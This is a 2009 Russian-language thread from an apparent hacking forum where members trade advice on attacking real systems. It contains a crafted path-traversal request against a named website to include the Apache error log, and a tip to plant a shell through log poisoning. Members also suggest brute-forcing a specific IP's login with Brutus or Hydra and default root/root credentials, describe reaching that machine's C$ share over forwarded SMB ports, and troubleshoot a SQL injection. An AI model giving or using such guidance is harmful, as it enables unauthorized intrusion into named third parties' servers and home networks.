Ваши вопросы по уязвимостям.

Discussion in 'Уязвимости' started by darky, 4 Aug 2007.

Thread Status:
Not open for further replies.
  1. Ctacok

    Ctacok Banned

    Joined:
    19 Dec 2008
    Messages:
    732
    Likes Received:
    646
    Reputations:
    251
    смотри в файлах,
    Просто в каждом браузере свой кэш.
    а в IE прям как есть файл так и сохраняется.
    ищи по swf
     
  2. Vlad-Online

    Vlad-Online New Member

    Joined:
    17 Jul 2008
    Messages:
    17
    Likes Received:
    0
    Reputations:
    0
    мне не файл нужно найти, мне нужен код (скорее всего на javascript) подгружающий флэшку не из инета, а из кэши браузера.
     
  3. Ctacok

    Ctacok Banned

    Joined:
    19 Dec 2008
    Messages:
    732
    Likes Received:
    646
    Reputations:
    251
    Такое невозможно)
     
  4. it's my

    it's my Banned

    Joined:
    29 Sep 2007
    Messages:
    335
    Likes Received:
    347
    Reputations:
    36
    название файла нужно знать и так же для определенного браузера свои методы загрузки из кэша
     
  5. Ctacok

    Ctacok Banned

    Joined:
    19 Dec 2008
    Messages:
    732
    Likes Received:
    646
    Reputations:
    251
    Вообще можно, но там то проверка на урл.
     
  6. Vlad-Online

    Vlad-Online New Member

    Joined:
    17 Jul 2008
    Messages:
    17
    Likes Received:
    0
    Reputations:
    0
    допустим название файла известно. Какие методы возможны в ИЕ, Фаерфокс или Опера???
    Заранее благодарен.
     
  7. nub-hacker

    nub-hacker Banned

    Joined:
    23 Jun 2009
    Messages:
    69
    Likes Received:
    5
    Reputations:
    -10
    Поодскажите плиз. в проге inetcrack в какое поле надо в писывать код чтобы инклудилось в еррор лог

    вот исхлдное

    Code:
    GET http://ya.ru/ HTTP/1.1
    Accept: */*
    Accept-Language: ru
    Accept-Encoding: gzip, deflate
    User-Agent: Mozilla/4.0 (compatible; MSIE 5.5; Windows 
    98)
    Host: ya.ru
    Proxy-Connection: Keep-Alive
    мой include вот http://www.holsteinworld.com/ontheroad/index.php?file=/../../../../../../../../../../../usr/local/apache2/logs/error_log

    как составить помогите плиз.
     
    #8127 nub-hacker, 23 Jul 2009
    Last edited: 23 Jul 2009
  8. AlexSatter

    AlexSatter Member

    Joined:
    29 Jan 2009
    Messages:
    303
    Likes Received:
    92
    Reputations:
    33
    в гет параметр воткни свой шелл, потом проинклудь и все будет окей
    был бы файл access, там можно было бы подменить useragent таким же макаром.

    кстати, не обязательно в данном случае использовать инеткрак или еще чего,для опыта делай просто через адресную строку
     
    #8128 AlexSatter, 23 Jul 2009
    Last edited: 23 Jul 2009
  9. mailbrush

    mailbrush Well-Known Member

    Joined:
    24 Jun 2008
    Messages:
    1,997
    Likes Received:
    996
    Reputations:
    155
    Code:
    GET http://holsteinworld.com/ontheroad/index.php?file=/../../../../../../../../../../../usr/local/apache2/logs/error_log HTTP/1.1
    Accept: */*
    Accept-Language: ru
    Accept-Encoding: gzip, deflate
    User-Agent: Mozilla/4.0 (compatible; MSIE 5.5; Windows 
    98)
    Host: holsteinworld.com
    Proxy-Connection: Keep-Alive
     
  10. ben1991

    ben1991 New Member

    Joined:
    29 Oct 2008
    Messages:
    5
    Likes Received:
    0
    Reputations:
    0
    как взломать пароль к системе вот переходиш по ссылке http://92.0.0.117/ и просит пароль , каким брутом можна подобрать?
     
  11. nemaniak

    nemaniak Elder - Старейшина

    Joined:
    10 Jun 2008
    Messages:
    195
    Likes Received:
    161
    Reputations:
    108
    любым брутом который брутит http basic авторизацию, даже можно старым добрым брутусом
     
  12. mailbrush

    mailbrush Well-Known Member

    Joined:
    24 Jun 2008
    Messages:
    1,997
    Likes Received:
    996
    Reputations:
    155
    Еще THC Hydra для линуска.
     
  13. cupper

    cupper Elder - Старейшина

    Joined:
    6 Jun 2007
    Messages:
    369
    Likes Received:
    92
    Reputations:
    5
    эм,
    root
    root
    :) правда входишь в настройки свича, или что там такое стоит
     
  14. nub-hacker

    nub-hacker Banned

    Joined:
    23 Jun 2009
    Messages:
    69
    Likes Received:
    5
    Reputations:
    -10
    Это adsl роутер-модем компа, который седит за NATом
     
    #8134 nub-hacker, 23 Jul 2009
    Last edited: 23 Jul 2009
  15. cupper

    cupper Elder - Старейшина

    Joined:
    6 Jun 2007
    Messages:
    369
    Likes Received:
    92
    Reputations:
    5
    ну так этож шикарно, и через него разве на комп низя попасть ? кстати если несложно либо тут в теме либо в ПМ скиньте потом как это можно сделать, если можно.
    И заодно интерестно из него какую палезную инфу можно вытащить.
    Все только ради интереса.
     
  16. nub-hacker

    nub-hacker Banned

    Joined:
    23 Jun 2009
    Messages:
    69
    Likes Received:
    5
    Reputations:
    -10
    можно. надо сделать проброс портов на 445 и 139 tcp и 137 udp на 127.0.0.1

    и зайти по адресуу в explorere \\92.0.0.117\c$

    и мы можем попасть на диск C


    //add

    какойто урод конфиг щас поменял, что теперь не зайти
     
    #8136 nub-hacker, 23 Jul 2009
    Last edited: 23 Jul 2009
  17. cupper

    cupper Elder - Старейшина

    Joined:
    6 Jun 2007
    Messages:
    369
    Likes Received:
    92
    Reputations:
    5
    ну значит эти логин и пароль как раз то что и искал ben1991.

    add ))
    оперативно работают
     
    #8137 cupper, 23 Jul 2009
    Last edited: 23 Jul 2009
  18. Ctacok

    Ctacok Banned

    Joined:
    19 Dec 2008
    Messages:
    732
    Likes Received:
    646
    Reputations:
    251
    Если открыт 445 порт то вам сюда >
    https://forum.antichat.ru/thread99665.html
     
  19. F4R

    F4R Banned

    Joined:
    20 Jun 2008
    Messages:
    224
    Likes Received:
    46
    Reputations:
    2
    странно... через "ордер бай" выяснил то что 19 колонок... когда их все пишу:
    выдаёт такую хрень!((
    подозреваю что в версии MySQL трабла так?
     
  20. FAQ666

    FAQ666 Elder - Старейшина

    Joined:
    17 Sep 2008
    Messages:
    38
    Likes Received:
    18
    Reputations:
    8
    F4R скорее всего union запрещен

    если хочешь, кинь в личку ссылку гляну что там.
     
    #8140 FAQ666, 23 Jul 2009
    Last edited: 23 Jul 2009
Thread Status:
Not open for further replies.